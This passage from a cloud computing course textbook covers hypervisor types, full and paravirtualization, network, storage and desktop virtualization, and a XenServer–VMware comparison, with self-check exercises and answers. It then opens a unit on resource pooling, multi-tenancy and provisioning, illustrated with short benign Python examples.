operating system to deliver virtualization-based services. Type 2 hypervisors are best suited
for endpoint devices such as personal computers that need to run an alternative operating
system, known as the guest OS. Type 2 hypervisors frequently provide an additional toolkit
that enhances the connection between the guest and host operating systems (see Figure 6).

Pros: A Type 2 hypervisor allows rapid and easy access to a guest OS while the main
operating system continues to run on the host physical machine. This facility helps
end users immensely in their work; for example, a user can keep using Cortana (a
speech assistant found only in Windows) on the host while accessing a favorite
Linux-based tool in a guest virtual machine.

Cons: Type 2 hypervisors can cause performance overhead because they always
need a host operating system in between the guest Operating system and
underlying physical device. It also poses latency concerns and a potential security
risk if the Host OS is compromised.
Figure 6. Type 2 Hypervisor

Example:

VMware Workstation: It is the product of VMware focused on Linux and


Windows users, and its free Version (Player) allows it to run a single guest OS
while its paid version(Pro) allows users to run multiple operating systems on a
single personal computer.

Check your Progress 2

1) Explain live and offline virtual machine migration.

………………………………………………………………………………………………
………………………………………………………………………………………………
………………………………………………………………………………………………

2) Write three advantages and disadvantages of server virtualization.

………………………………………………………………………………………………
………………………………………………………………………………………………
………………………………………………………………………………………………

3) Compare between Type 1 hypervisor and Type 2 hypervisor.

………………………………………………………………………………………………
………………………………………………………………………………………………
………………………………………………………………………………………………

3.6.1 Full Virtualization:-

Full virtualization is a technique to run an application or operating system directly on a

VM without any alteration, so that it seems to the operating system that it is running on the
real physical hardware. In order to achieve this, the virtual machine manager provides an
environment that fully imitates the complete real hardware. In other words, full
virtualization is a strategy for creating a virtual machine environment that entirely
imitates the physical hardware, so any software that can run on the underlying physical
device can be executed in the virtual machine. One of the important benefits of full
virtualization is that it allows unaltered guest operating systems to execute in isolation.
This provides extra security and enables different unmodified operating systems to run in the
same environment. For example, in operating system design, newly developed experimental code
can run alongside previous versions of the operating system in isolated virtual machines. The
virtual machine manager helps each virtual machine obtain all of the existing services of the
underlying physical system, while the virtual machine completely isolates the guest operating
system from the underlying hardware.

Binary translation and direct execution are used together to accomplish full virtualization.
In a full virtualization hypervisor, the hardware CPU runs non-sensitive instructions directly
at normal speed, while sensitive, operating-system-related instructions are translated on the
fly. Since the same kind of guest operating system instance can execute on a virtualized
system or on a real physical system, the full virtualization technique delivers the isolation
and security needed by virtual instances running in the virtual environment (see Figure 7).

Further, binary translation is a method of establishing full virtualization that does not
necessitate hardware virtualization. It entails looking for "unsafe" instructions in the
virtual guest's executable code, translating them into "safe" equivalents, and running the
translated code. If we talk with respect to VMware hypervisor, both direct execution and
binary translation techniques may be used to virtualize an operating system.
Figure 7: The figure depicts the full virtualization paradigm.
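To convey the idea of binary translation only, the toy sketch below (a conceptual illustration, not how a production hypervisor such as VMware is actually implemented) scans a stream of hypothetical guest "instructions", rewrites the sensitive ones into safe emulated equivalents, and leaves the non-sensitive ones untouched for direct execution; all instruction and handler names are made up for the example.

```python
# Toy illustration of the binary translation idea: sensitive guest
# instructions are rewritten to safe, emulated equivalents, while
# ordinary instructions are passed through for direct execution.
SENSITIVE = {
    "write_cr3": "vmm_emulate_page_table_switch",
    "cli":       "vmm_emulate_disable_interrupts",
    "out":       "vmm_emulate_io_port_write",
}

def translate(guest_code):
    """Return a translated instruction stream that is safe to execute."""
    translated = []
    for instr in guest_code:
        opcode = instr.split()[0]
        if opcode in SENSITIVE:
            # Unsafe instruction: replace it with an emulated handler call.
            translated.append(SENSITIVE[opcode] + instr[len(opcode):])
        else:
            # Non-sensitive instruction: direct execution path.
            translated.append(instr)
    return translated

guest_code = ["mov eax, 1", "cli", "add eax, 2", "out 0x3f8, eax"]
print(translate(guest_code))
```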

3.6.2 Paravirtualization:-

Paravirtualization is a virtualization approach for computing devices that gives virtual

machines (VMs) an interface comparable to the underlying hardware. This strategy seeks to
increase the VM's performance by altering the guest operating system (OS). Within
paravirtualization the guest OS is updated: it recognizes that it is executing in a
virtualized environment on top of a hypervisor (the VM's "hardware") rather than on actual
hardware.

Paravirtualization, which means "alongside virtualization," refers to communication

between the guest OS and the hypervisor to improve performance and efficiency. As shown in
Figure 8, paravirtualization entails replacing non-virtualizable instructions with hypercalls
that communicate directly with the hypervisor's virtualization layer. The hypervisor also
provides hypercall interfaces for other essential kernel tasks, including memory management,
interrupt handling, and timekeeping.

Full virtualization, in which the unmodified OS is unaware that it is virtualized and


sensitive OS calls are captured using binary translation, is not the same as
paravirtualization. Paravirtualization's value proposition is decreased virtualization
overhead. However, the performance advantage of paravirtualization over full
virtualization varies substantially depending on the workload. Paravirtualization's
compatibility and portability are limited because it cannot support unmodified operating
systems (e.g., Windows 2000/XP). Because it necessitates profound OS kernel
alterations, paravirtualization can cause substantial support and maintainability concerns
in production situations. The open-source Xen project, for example, uses a modified
Linux kernel to virtualize the processor and memory and proprietary guest OS device
drivers to virtualize the I/O.
While the more complex binary translation support required for full virtualization is
complicated, changing the guest OS to enable paravirtualization is reasonably
straightforward. For years, VMware has deployed paravirtualization approaches in
VMware tools and optimized virtual device drivers throughout the VMware product
range. The VMware tools service gives access to the VMM Hypervisor's backdoor,
which can do tasks like time synchronization, logging, and guest termination. Vmxnet is
a hypervisor-sharing para-virtualized I/O device driver. It can take advantage of the
capabilities of the host device to increase throughput while lowering CPU usage. The
VMware tools service and the VMXnet device driver are not CPU paravirtualization
solutions, which should be noted for clarity. They are minor, non-intrusive adjustments
that do not require any changes to the guest OS kernel. Going forward, VMware will assist in
creating para-virtualized Linux versions to enable proofs of concept and product development.

Figure 8: The figure depicts the paravirtualization paradigm

3.6.3 Hardware-Assisted Virtualization:-

The other name for this virtualization is native virtualization, accelerated virtualization,
or hardware virtualization. In this type of virtualization, a special CPU instruction is
provided by real physical hardware to support virtualization. The adopted methodology is
very portable as the virtual machine manager can run an unaltered guest operating
system. This kind of methodology minimizes the implementation complexity of the
hypervisor and allows the hypervisor to manage the virtualized environment efficiently.
This sort of virtualization technique was initially launched on the IBM System / 370 in
1972, and it was made available on Intel and AMD CPUs in 2006. In this kind of
virtualization methodology, sensitive calls are by default forwarded to the hypervisor. It
is no longer necessary to use binary translation during full virtualization or hyper calls
during paravirtualization. Figure 9 depicts the hardware-assisted virtualization technique.
Figure 9: The figure depicts the hardware-assisted virtualization techniques.
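On a Linux host, a simple way to check whether the processor exposes these hardware virtualization extensions is to look for the corresponding CPU flags in /proc/cpuinfo (vmx for Intel VT and svm for AMD-V), as in the short sketch below.

```python
# Minimal sketch: detect hardware-assisted virtualization support on a
# Linux host by checking the CPU flags (vmx = Intel VT, svm = AMD-V).
def cpu_flags():
    with open("/proc/cpuinfo") as f:
        for line in f:
            if line.startswith("flags"):
                return set(line.split(":")[1].split())
    return set()

flags = cpu_flags()
if "vmx" in flags:
    print("Intel VT (vmx) available")
elif "svm" in flags:
    print("AMD-V (svm) available")
else:
    print("No hardware-assisted virtualization support detected")
```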

3.7 Network virtualization:-

Network virtualization is the process of converting a hardware-dependent network into

a software-based network. The underlying purpose of network virtualization is to virtualize
network routing protocols, forwarding, and different addressing schemes. Like every form of
IT virtualization, network virtualization creates a layer of abstraction between the virtual
hardware and the activities that use it. In particular, it allows network functionalities,
hardware resources, and software resources to be offered as a virtual network, independent of
the hardware. It is used to join virtual machines (VMs), partition a physical network, or
merge many physical networks, and it can improve digital service providers' overall
performance, flexibility, and reliability.
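As a small, hedged illustration of turning network functions into software, the sketch below uses the standard Linux iproute2 commands (run with root privileges) to create a virtual switch (a Linux bridge) and a virtual cable (a veth pair), the kind of building blocks commonly used to join virtual machines into a virtual network; the interface names are arbitrary placeholders.

```python
# Minimal sketch: building a software-defined network segment on Linux
# using iproute2 (requires root). Interface names are placeholders.
import subprocess

def run(cmd: str) -> None:
    print("+", cmd)
    subprocess.run(cmd.split(), check=True)

# A Linux bridge acts as a virtual switch.
run("ip link add name br0 type bridge")
run("ip link set br0 up")

# A veth pair acts as a virtual cable; one end could be handed to a VM
# or container, the other end is plugged into the virtual switch.
run("ip link add veth0 type veth peer name veth1")
run("ip link set veth0 master br0")
run("ip link set veth0 up")
run("ip link set veth1 up")
```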

3.8 Storage virtualization:-

Storage virtualization (sometimes referred to as software-defined storage or virtual SAN)


is the process of combining different physical massive volumes of data from SANs into a
virtualized storage device. The pool may combine disparate storage gear from multiple
networks, manufacturers, or data centers into a unified logical perspective and control it
through a single window. Virtualizing storage removes the storage management software
from the underlying physical infrastructure to give more flexibility and sustainable pools
of storage resources. Furthermore, it may abstract storage hardware (arrays and discs)
into online storage pools. Figure 10 shows the storage virtualization.
Figure 10: Depicts the Storage virtualization
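A familiar example of this kind of pooling is the Linux Logical Volume Manager (LVM). The hedged sketch below (the device names are placeholders and the commands require root privileges) combines two physical disks into a single volume group and then carves a logical volume out of that pool.

```python
# Minimal sketch: pooling physical disks into one logical volume with LVM
# (requires root; /dev/sdb and /dev/sdc are placeholder device names).
import subprocess

def run(cmd: str) -> None:
    print("+", cmd)
    subprocess.run(cmd.split(), check=True)

run("pvcreate /dev/sdb /dev/sdc")                    # mark disks as physical volumes
run("vgcreate storage_pool /dev/sdb /dev/sdc")       # pool them into one volume group
run("lvcreate -L 50G -n data_volume storage_pool")   # carve out a logical volume
```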

3.9 Desktop virtualization:-

In this type of virtualization, a software-based virtualized version of users’ workstations


is created such that the virtual environment may be accessed from any place remotely.
This type of virtualized environment may enable any user to connect themselves through
any devices having network connectivity. A very important element of digital workspace
includes desktop virtualization. In a desktop virtualization environment, mostly virtual
machines are used to run the workload. Further, it should be also noted that, in this type
of virtualization technique, all the information and data of end-users are present in the
server. Thus risk involved with respect to loss of any user data is minimum if devices are
lost. There are a number of ways through which desktop virtualization may be
implemented. However, the most acceptable ones are local and remote desktop
virtualization.

3.10 Operating system virtualizations:-

Operating system virtualization uses a modified version of a standard operating system that

allows several users to access and run different applications, all on a single machine at the
same time. The virtual environment within operating system virtualization accepts commands
from any client operating it and performs various tasks on the same machine while running
various applications. Under operating system virtualization, one program does not interfere
with another even though they run on the same computer. The operating system's kernel allows
for the existence of several segregated user-space instances; these instances are referred to
as software containers, or virtualization engines. Operating system virtualization is of two
types: (i) Linux virtualization and (ii) Windows virtualization.

● Linux Operating System virtualization: To virtualize Linux computers,


VMware Workstation software is utilized. Furthermore, to install any software
using virtualization, the user must first install VMware software.
● Windows Operating System Virtualizations: This sort of virtualization is
similar to the previous in that it requires the installation of VMware software
before any other software can be installed.

3.11 XenServer Vs VMware

Next, we will discuss the major difference between two very well-known hypervisors Citrix
XenServer and VMware.

VMware vSphere ESXi Hypervisor vs. Citrix XenServer Hypervisor

➔ Licensing and target users:
   VMware: generally used by small and mid-sized businesses; requires a proprietary license, provided on a
   per-processor basis.
   XenServer: a virtualization platform utilized by individuals as well as small and medium businesses; it is open
   source and also provides per-server licensing, and the free version includes almost all the features.

➔ Dynamic resource allocation:
   VMware: features like dynamic resource allocation are supported.
   XenServer: dynamic resource allocation is not supported.

➔ Virtual CPUs and hardware requirements:
   VMware: 128 virtual CPUs (vCPUs) per virtual machine; it can run on either Intel VT or AMD-V capable systems.
   XenServer: 32 virtual CPUs per virtual machine; it can only run on Intel VT or AMD-V capable systems.

➔ Host and guest operating systems:
   VMware vSphere: only MS-DOS and FreeBSD are supported as hosts; as guest OS it supports MS-DOS, Sun Java Desktop
   System, and Solaris x86 Platform Edition.
   XenServer: supports various host OS such as Win NT Server, Win XP, Linux ES, etc.; it also supports various guest
   operating systems, but not MS-DOS, Sun Java Desktop Environment, or Solaris x86 Platform Edition, and it needs
   AMD-V capable hardware to run.

➔ Failover, migration and provisioning:
   VMware: supports failover and live migration, dynamic resource allocation, and thin provisioning.
   XenServer: does not support failover or live migration (newer versions support live migration, but not as
   efficiently); supports only thin provisioning.

➔ Graphics support:
   VMware: the graphics support is not exhaustive.
   XenServer: the graphics support is exhaustive and better than VMware's.

➔ Management:
   VMware: BusyBox is used by the VMware server management system for managing the environment.
   XenServer: provides almost all the required features and the ability to create and manage the virtualization
   environment, and it uses XenCenter for managing the environment.
Check your Progress 3

1) What is the difference between full virtualization and paravirtualization?

………………………………………………………………………………………………
………………………………………………………………………………………………
………………………………………………………………………………………………

2) Discuss briefly network and storage virtualization.

………………………………………………………………………………………………
………………………………………………………………………………………………
………………………………………………………………………………………………

3) State whether each statement is True (T) or False (F):

a. Full virtualization is a technique to run an application or operating system directly on a VM without any
alteration, and it seems to the operating system that it is running on the real physical hardware. [ ]

b. A binary translation and direct execution are used together to accomplish full virtualization. [ ]

c. Paravirtualization, which means "alongside virtualization," refers to communication between the guest OS and the
hypervisor to improve performance and efficiency. [ ]

d. Native virtualization is also called Hardware-Assisted Virtualization. [ ]

e. Network virtualization is the process of converting a software-dependent network into a hardware-based
network. [ ]

3.12 SUMMARY
Virtualization is the fundamental technology that helps to create an abstraction layer over the
available System hardware elements like processor, storage, and memory. Virtualization allows to
hide the intricacy of the underlying environment and provides a secure and isolated environment
for any user application. The created computing environment is virtual and it simulates an
environment similar to a real computer. The use of the virtual infrastructure is smooth as the user
finds almost no difference in the experience when compared to a real computing environment. In
this regard, a detailed overview of virtualization is given in this unit. We have discussed some
very important topics related to virtualization like advantages of virtualization, different
virtualization techniques, and its characteristics with an example. For further clarity of existing
virtualization techniques like full virtualization and paravirtualization, we have compared the two
very well-known hypervisors Citrix XenServer and VMware.

3.13 SOLUTIONS/ANSWERS
Check your Progress 1
Ans 1: Cloud Computing is a framework where different kinds of services related to networks,
computing resources, storage, development platform, and application are provisioned through the
internet. Further, Virtualization is the fundamental technology that creates an abstraction to hide
the complexity of computing infrastructure, storage, and networking. The virtualization technique
provides a secure and isolated environment for cloud users such that the computing environment
of one user does not affect the computing environment of another user.

Ans 2: In the case of virtualization more than one guest virtual machine runs on a single host
machine, and on each virtual machine different virtual applications are executed. Further, it is
very important to run each virtual machine in isolation such that no two applications running on
different virtual machines interfere with each other. In this respect, virtual machine manager
(VMM) plays an important role by managing virtual machines efficiently and providing enough
security. The operations of the different virtual machines are observed by VMM and filtered
accordingly such that no unfavorable activity is permitted. Sometimes it becomes important to
hide some sensitive or important data of the host from other guest applications running on the
same system. This kind of functionality is automatically provided by the virtualization
environment with the help of VMM.

Ans 3: In the case of emulation, the virtualization environment allows different guest applications
to run on top of the host physical machine. Here the underlying virtualized environment is a
software program and hence can be controlled more efficiently. Further, based on the requirement
of guest application or program the underlying environment can be adjusted or modified for
smooth execution.

In case of isolation, the virtualization environment enables guest virtual machines to run in
isolation such that no virtual machines running on the same host physical machine interfere with
each other. The guest virtual application accesses the underlying resources through the
abstraction layer. The virtual machine manager monitors the operation of each guest application
and tries to prevent vulnerable activity operation if any.

Check your Progress 2


Ans 1: Virtualization maximizes the availability and reliability of the service, by allowing virtual
machines to move from one host machine to another and this is called a virtual machine
migration. The migration of virtual machines is achievable as the underlying environment is
virtual. The virtual machine migration can be achieved offline or live. In case of offline migration
the guest virtual machine is temporarily stopped and after copying the image of the virtual
machine’s memory to the destination host machine virtual machine is restarted. Next in the case
of live migration an active virtual machine is moved from one host machine to another. It should
also be noted that virtualization technology prefers to migrate virtual machines from one host
machine to another when some kind of load balancing is required.

Ans 2: The advantages associated with server virtualization are as follows:


● In the case of server virtualization, each virtual machine may be restarted independently
without affecting the execution of other virtual machines running on the same host
physical machine.
● Server virtualization can partition a single physical server into many small virtual servers
and allows to utilize the hardware of the existing physical servers efficiently. Therefore
this minimizes the requirement of the extra physical servers and the initial investment
cost.
● As each small virtual server executes in isolation, if any virtual machine faces any kind of
issues then it will not affect the execution of other virtual machines running on the same
host physical machine.

The disadvantages associated with server virtualization are as follows:


● In the case of a host physical machine, the server faces any problem and it goes offline
then all the guest virtual machines will also get affected and will go offline. This will
decrease the overall uptime of the services or applications running on an individual
virtual machine.
● Server virtualization allows the running of many numbers of virtual machines on the
same physical server, this may reduce the performance of the overall virtualized
environment.
● Generally, server virtualization environments are not easy to set up and manage.

Ans 3: Type 1 hypervisor: This is also termed as “Bare metal” hypervisor. This type of
hypervisor runs directly on the underlying physical resources. For running this kind of hypervisor
operating system is not required and it itself acts as a host operating System. These kinds of
hypervisors are most commonly used in virtual server scenarios. The examples are Hyper-V
hypervisor, Citrix XenServer, and ESXi hypervisor.

Type 2 hypervisor: This hypervisor is not compatible with the hardware it is running on. It runs
as a program on a computer's operating system. This type of hypervisor takes the help of an
operating system to deliver virtualization-based services. Type 2 hypervisors are best suited for
endpoint devices such as personal computers that run an alternative operating system known as
Guest OS. An example is VMware Workstation.

Check your Progress 3


Ans 1: Full virtualization is a technique to run an application or operating system directly on a
VM without any alteration and it seems to the operating system that it is running on the real
physical hardware. In order to achieve this, the virtual machine manager provides an environment
that fully imitates the complete real hardware. In other words, full virtualization is a strategy for
creating a virtual machine environment that entirely imitates the physical hardware. Every
software can run on the underlying devices executed in the Virtual machine. One of the important
benefits with respect to full virtualization is that it allows the execution of the unaltered guest
operating systems in isolation. These kinds of features provide extra security and enable the
running of different unmodified operating systems in the same environment.
Paravirtualization is a virtualization approach for computing devices that enables virtual
machines (VMs) to get an interface comparable to the underlying or guest hardware. This strategy
seeks to increase the VM's performance (OS) by altering the guest operating system. The guest
OS is updated within paravirtualization. It recognizes that it is executing in a virtualized
environment on top of something like a hypervisor (the VM's hardware) rather than on actual
hardware.

Ans 2: Network virtualization is the process of converting a hardware-dependent network into a software-based
network. The underlying purpose of network virtualization is to virtualize network routing protocols, forwarding, and
different addressing schemes. Like every form of IT virtualization, network virtualization creates a layer of
abstraction between the virtual hardware and the activities that use it. In particular, it allows network
functionalities, hardware resources, and software resources to be offered as a virtual network, independent of the
hardware. It is used to join virtual machines (VMs), partition a physical network, or merge many physical networks,
and it can improve digital service providers' overall performance, flexibility, and reliability.

Storage virtualization (sometimes referred to as software-defined storage or virtual SAN) is the process of combining
different physical massive volumes of data from SANs into a virtualized storage device. The pool may combine disparate
storage gear from multiple networks, manufacturers, or data centers into a unified logical perspective and control it
through a single window. Virtualizing storage removes the storage management software from the underlying physical
infrastructure to give more flexibility and sustainable pools of storage resources. Furthermore, it may abstract
storage hardware (arrays and discs) into online storage pools.

Ans 3:
a. True
b. True
c. True
d. True
e. False

9. FURTHER READINGS
There are a host of resources available for further reading on the topic of Virtualization.
1. R. Buyya, C. Vecchiola, and S. T. Selvi (2013). Mastering Cloud Computing:
Foundations and Applications Programming. Newnes.
2. S. A. Babu, M. J. Hareesh, J. P. Martin, S. Cherian, and Y. Sastri, "System Performance
Evaluation of Para Virtualization, Container Virtualization, and Full Virtualization Using
Xen, OpenVZ, and XenServer," 2014 Fourth International Conference on Advances in
Computing and Communications, 2014, pp. 247-250, doi: 10.1109/ICACC.2014.66.
3. https://www.ibm.com/in-en/cloud/learn/hypervisors#toc-type-1-vs--Ik2a8-2y
4. https://www.vmware.com/topics/glossary/content/hypervisor.html
5. https://www.sciencedirect.com/topics/computer-science/full-
virtualization#:~:text=Full%20virtualization%20is%20a%20virtualization,run%20in%20
each%20individual%20VM.
UNIT 4 RESOURCE POOLING, SHARING AND
PROVISIONING

4.1 Introduction
4.2 Objectives
4.3 Resource Pooling
4.4 Resource Pooling Architecture
4.4.1 Server Pool
4.4.2 Storage Pool
4.4.3 Network Pool
4.5 Resource Sharing
4.5.1 Multi Tenancy
4.5.2 Types of Tenancy
4.5.3 Tenancy at Different Level of Cloud Services
4.6 Resource Provisioning and Approaches
4.6.1 Static Approach
4.6.2 Dynamic Approach
4.6.3 Hybrid Approach
4.7 VM Sizing
4.8 Summary

4.1 INTRODUCTION

Resource pooling is the one of the essential attributes of Cloud Computing technology which
separates cloud computing approach from the traditional IT approach. Resource pooling along
with virtualization and sharing of resources, leads to dynamic behavior of the cloud. Instead of
allocating resources permanently to users, they are dynamically provisioned on a need basis.
This leads to efficient utilization of resources as load or demand changes over a period of time.
Multi-tenancy allows a single instance of an application software along with its supporting
infrastructure to be used to serve multiple customers. It is not only economical and efficient to
the providers, but may also reduce the charges for the consumers.

4.2 OBJECTIVES
After going through this unit, you should be able to:

 Know about Resources pooling –Compute, Storage and Network pools


 Know about Resources pooling architectures
 Know about Resources sharing techniques
 Know about various provisioning approaches
 Describe how VM resizing is performed
 Know about resource pricing

4.3 RESOURCE POOLING
Resource pool is a collection of resources available for allocation to users. All types of resources
– compute, network or storage, can be pooled. It creates a layer of abstraction for consumption
and presentation of resources in a consistent manner. A large pool of physical resources is
maintained in cloud data centers and presented to users as virtual services. Any resource from
this pool may be allocated to serve a single user or application, or can be even shared among
multiple users or applications. Also, instead of allocating resources permanently to users, they
are dynamically provisioned on a need basis. This leads to efficient utilization of resources as
load or demand changes over a period of time.
For creating resource pools, providers need to set up strategies for categorizing and management
of resources. The consumers have no control or knowledge of the actual locations where the
physical resources are located. Although some service providers may provide choice for
geographic location at higher abstraction level like- region, country, from where customer can
get resources. This is generally possible with large service providers who have multiple data
centers across the world.

Fig 4.1 Pooling of Physical and Virtual Resources

4.4 RESOURCE POOLING ARCHITECTURE

Each pool of resources is made by grouping multiple identical resources for example – storage
pools, network pools, server pools etc. A resource pooling architecture is then built by
combining these pools of resources. An automated system is needed to be established in order to
ensure efficient utilization and synchronization of pools.

Computation resources are majorly divided into three categories – Server , Storage and Network.
Sufficient quantities of physical resources of all three types are hence maintained in a data
center.

4.4.1 Server Pools

Server pools are composed of multiple physical servers along with operating system, networking
capabilities and other necessary software installed on it. Virtual machines are then configured
over these servers and then combined to create virtual server pools. Customers can choose virtual
machine configurations from the available templates (provided by cloud service provider) during
provisioning. Also, dedicated processor and memory pools are created from processors and
memory devices and maintained separately. These processor and memory components from their
respective pools can then be linked to virtual servers when demand for increased capacity arises.
They can further be returned to the pool of free resources when load on virtual servers decreases.

4.4.2 Storage Pools

Storage resources are one of the essential components needed for improving performance, data
management and protection. It is frequently accessed by users or applications as well as needed
to meet growing requirements, maintaining backups, migrating data, etc.

Storage pools are composed of file based, block based or object based storage made up of
storage devices like- disk or tapes and available to users in virtualized mode.

1. File based storage – it is needed for applications that require file system or shared file access.
It can be used to maintain repositories, development, user home directories, etc.

2. Block based storage – it is a low latency storage needed for applications requiring frequent
access like databases. It uses block level access hence needs to be partitioned and formatted
before use.

3. Object based storage – it is needed for applications that require scalability, unstructured data
and metadata support. It can be used for storing large amounts of data for analytics, archiving or
backups.

4.4.3 Network Pools

Resources in pools can be connected to each other, or to resources from other pools, by network
facility. They can further be used for load balancing, link aggregation, etc.

Network pools are composed of different networking devices like- gateways, switches, routers,
etc. Virtual networks are then created from these physical networking devices and offered to
customers. Customers can further build their own networks using these virtual networks.

Generally, dedicated pools of resources of different types are maintained by data centers. They
may also be created specific to applications or consumers. With the increasing number of
resources and pools, it becomes very complex to manage and organize pools. Hierarchical
structure can be used to form parent-child, sibling, or nested pools to facilitate diverse resource
pooling requirements.
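The idea of drawing resources from a shared pool and returning them when demand falls can be
illustrated with a small Python sketch. This is only an illustration under assumed names
(ResourcePool, allocate, release); it is not the interface of any real cloud platform.

class ResourcePool:
    def __init__(self, name, capacity):
        self.name = name
        self.free = capacity          # e.g. CPU cores, GB of RAM or disk
        self.allocated = {}           # consumer -> units currently held

    def allocate(self, consumer, amount):
        # Grant 'amount' units to a consumer if the pool can satisfy the request.
        if amount > self.free:
            raise RuntimeError(self.name + ": only " + str(self.free) + " units free")
        self.free -= amount
        self.allocated[consumer] = self.allocated.get(consumer, 0) + amount

    def release(self, consumer, amount):
        # Return units to the pool so that other consumers can reuse them.
        held = self.allocated.get(consumer, 0)
        amount = min(amount, held)
        self.allocated[consumer] = held - amount
        self.free += amount

# Usage: a processor pool shared by two virtual servers.
cpu_pool = ResourcePool("cpu-cores", capacity=64)
cpu_pool.allocate("vm-1", 8)
cpu_pool.allocate("vm-2", 4)
cpu_pool.release("vm-1", 4)    # vm-1 shrinks; the cores go back to the pool
print(cpu_pool.free)           # 56

In practice such a pool would be managed by the provider's automated system; the sketch only
shows why pooled resources can be reused as demand changes.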

Check Your Progress 1

1. What is a Resource pool ?


2. Explain Resource pooling architecture.
3. What are the various types of storage pools available? Explain.

4.5 RESOURCE SHARING

Cloud computing technology makes use of resource sharing in order to increase resource
utilization. At a time, a huge number of applications can be running over a pool. But they may
not attain peak demands at the same time. Hence, sharing them among applications can increase
average utilization of these resources.

Although resource sharing offers multiple benefits like – increasing utilization, reduces cost and
expenditure, but also introduces challenges like – assuring quality of service (QoS) and
performance. Different applications competing for the same set of resources may affect run time
behavior of applications. Also, the performance parameters like- response and turnaround time
are difficult to predict. Hence, sharing of resources requires proper management strategies in
order to maintain performance standards.

4.5.1 Multi-tenancy

Multi-tenancy is one of the important characteristics found in public clouds. Unlike traditional
single tenancy architecture which allocates dedicated resources to users, multi-tenancy is an
architecture in which a single resource is used by multiple tenants (customers) who are isolated
from each other. Tenants in this architecture are logically separated but physically connected. In
other words, a single instance of a software can run on a single server but can serve multiple
tenants. Here, the data of each tenant is kept separately and securely from the others. Fig 4.2 shows
single tenancy and multi-tenancy scenarios.

Multi-tenancy leads to sharing of resources by multiple users without the user being aware of it.
It is not only economical and efficient to the providers, but may also reduce the charges for the
consumers. Multi-tenancy is a feature enabled by various other features like- virtualization,
resource sharing, dynamic allocation from resource pools.

In this model, physical resources cannot be pre-occupied by a particular user. Neither the
resources are allocated to an application dedicatedly. They can be utilized on a temporary basis
by multiple users or applications as and when needed. The resources are released and returned to
a pool of free resources when demand is fulfilled which can further be used to serve other
requirements. This increases the utilization and decreases investment.

Fig 4.2: Single tenancy Vs Multi-tenancy

4.5.2 Types of Tenancy

There are two types of tenancy – Single tenancy and multi-tenancy.

In single tenancy architecture, a single instance of an application software along with its
supporting infrastructure, is used to serve a single customer. Customers have their own
independent instances and databases which are dedicated to them. Since there is no sharing with
this type of tenancy, it provides better security but costs more to the customers.

In multi-tenancy architecture, a single instance of an application software along with its


supporting infrastructure, can be used to serve multiple customers. Customers share a single
instance and database. Customer’s data is isolated from each other and remains invisible to
others. Since users are sharing the resources, it costs less to them as well as is efficient for the
providers.

Multi-tenancy can be implemented in three ways –

1. Single multi-tenant database - It is the simplest form where a single application instance
and a single database instance are used to host all the tenants. It is a highly scalable architecture
where more tenants can be added to the shared database. It also reduces cost due to sharing of
resources but increases operational complexity (a small sketch contrasting the first two options
follows this list).

2. One database per tenant – It is another form where a single application instance and
separate database instances are used for each tenant. Its scalability is low and costs higher as
compared to a single multi-tenant database due to overhead included by adding each database.
Due to separate database instances, its operational complexity is less.

3. One app instance and one database per tenant - It is the architecture where the whole
application is installed separately for each tenant. Each tenant has its own separate app and
database instance. This allows a high degree of data isolation but increases the cost.
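As an illustration of the first two implementation options above, the following Python sketch uses
SQLite purely for brevity; the table layout, tenant names and column names are hypothetical and
not taken from any real SaaS product.

import sqlite3

# 1. Single multi-tenant database: all tenants share one table; every query
#    must be scoped by tenant_id to keep each tenant's data isolated.
shared = sqlite3.connect(":memory:")
shared.execute("CREATE TABLE orders (tenant_id TEXT, item TEXT)")
shared.execute("INSERT INTO orders VALUES ('tenant_a', 'book')")
shared.execute("INSERT INTO orders VALUES ('tenant_b', 'pen')")

def orders_for(tenant_id):
    # Forgetting this WHERE clause would leak another tenant's data.
    return shared.execute(
        "SELECT item FROM orders WHERE tenant_id = ?", (tenant_id,)
    ).fetchall()

print(orders_for("tenant_a"))    # [('book',)] only

# 2. One database per tenant: isolation by construction, but one more
#    database instance to operate for every tenant that is added.
tenant_dbs = {t: sqlite3.connect(":memory:") for t in ("tenant_a", "tenant_b")}
for db in tenant_dbs.values():
    db.execute("CREATE TABLE orders (item TEXT)")
tenant_dbs["tenant_a"].execute("INSERT INTO orders VALUES ('book')")

The sketch shows the trade-off discussed above: the shared table scales easily but every query must
be tenant-aware, whereas separate databases isolate tenants by construction at a higher operating cost.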

4.5.3 Tenancy at Different Level of Cloud Services

Multi-tenancy can be applied not only in public clouds but also in private or community
deployment models. Also, it can be applied to all three service models – Infrastructure as a
Service (IaaS), Platform as a Service (PaaS) and Software as a Service (SaaS). Multi-tenancy
when performed at infrastructure level, makes other levels also multi-tenant to certain extent.

Multi-tenancy at IaaS level can be done by virtualization of resources and customers sharing the
same set of resources virtually without affecting others. In this, customers can share
infrastructure resources like- servers, storage and network.

Multi-tenancy at PaaS level can be done by running multiple applications from different vendors
over the same operating system. This removes the need for separate virtual machine allocation
and leads to customers sharing operating systems. It increases utilization and ease maintenance.

Multi-tenancy at SaaS level can be done by sharing a single application instance along with a
database instance. Hence a single application serves multiple customers. Customers may be
allowed to customize some of the functionalities like- change view of interface but they are not
allowed to edit applications since it is serving other customers also.

Check Your Progress 2

1. What is a Single tenancy and Multi-tenancy?


2. Explain tenancy at different service levels of cloud.

4.6 RESOURCE PROVISIONING AND


APPROACHES

Resource provisioning is the process of allocating resources to applications or the customers.


When a customer demands resources, they must be provisioned automatically from a shared pool
of configurable resources. Virtualization technology makes the allocation of resources faster. It
allows creation of virtual machines in minutes, where customers can choose configurations of
their own. Proper management of resources is needed for rapid provisioning.

Resource provisioning is required to be done efficiently. Physical resources are not allocated to
users directly. Instead, they are made available to virtual machines, which in turn are allocated to
users and applications. Resources can be assigned to virtual machines using various
provisioning approaches. There can be three types of resources provisioning approaches– static,
dynamic and hybrid.

4.6.1 Static Approach

In static resource provisioning, resources are allocated to virtual machines only once, at the
beginning according to user’s or application’s requirement. It is not expected to change further.
Hence, it is suitable for applications that have predictable and static workloads. Once a virtual
machine is created, it is expected to run without any further allocations.

Although there is no runtime overhead associated with this type of provisioning, it has several
limitations. For any application, it may be very difficult to predict future workloads. It may lead
to over-provisioning or under-provisioning of resources. Under-provisioning is the scenario
when actual demand for resources exceeds the available resources. It may lead to service
downtime or application degradation. This problem may be avoided by reserving sufficient
resources in the beginning. But reserving large amounts of resources may lead to another
problem called Over-provisioning. It is a scenario in which the majority of the resources remain
un-utilized. It may lead to inefficiency to the service provided and incurs unnecessary cost to the
consumers. Fig 2 shows the under-provisioning and Fig 3 shows over-provisioning scenarios.

Fig 2: Problem of Resource Under-provisioning

